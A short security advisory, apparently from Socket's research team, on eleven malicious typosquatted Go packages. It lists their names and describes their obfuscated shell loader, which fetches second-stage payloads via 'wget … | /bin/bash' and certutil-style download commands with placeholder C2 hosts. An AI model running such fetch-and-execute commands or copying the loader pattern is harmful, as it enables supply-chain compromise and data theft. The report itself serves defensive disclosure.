11 Malicious Go Packages Distribute Obfuscated Remote Payloads
Socket’s Threat Research Team uncovered eleven malicious Go packages, ten of which are still live on the Go Module and eight of which are typosquats, that conceal an identical index-based string obfuscation routine. At runtime the code silently spawns a shell, pulls a second-stage payload from an interchangeable set of .icu and .tech command and control (C2) endpoints, and executes it in memory. Most of the C2 endpoints share the path /storage/de373d0df/a31546bf, and six of the ten URLs are still reachable, giving the threat actor on-demand access to any developer or CI system that imports the packages. The eight packages include the following: github.com/stripedconsu/linker github.com/agitatedleopa/stm github.com/expertsandba/opt github.com/wetteepee/hcloud-ip-floater github.com/weightycine/replika github.com/ordinarymea/tnsr_ids github.com/ordinarymea/TNSR_IDS github.com/cavernouskina/mcp-go github.com/lastnymph/gouid github.com/sinfulsky/gouid github.com/briefinitia/gouid The packages all use an exec.Command("/bin/sh","-c", %3Cobfuscated%3E) construct. The array-driven decoder rebuilds a one-liner that downloads a bash script with wget -O - %3CC2%3E | /bin/bash & on Unix systems, or (2) uses -urlcache -split -f %3CC2%3E %TEMP%\\appwinx64.exe followed by a background start on Windows. Observed second-stage ELF and PE binaries enumerate host information, read browser data, and beacon outbound, often after a first stage triggers a one-hour sleep to evade sandboxes. Because the second-stage payload delivers a bash-scripted payload for Linux systems and retrieves Windows executables via certutil.exe, both Linux build servers and Windows workstations are susceptible to compromise.
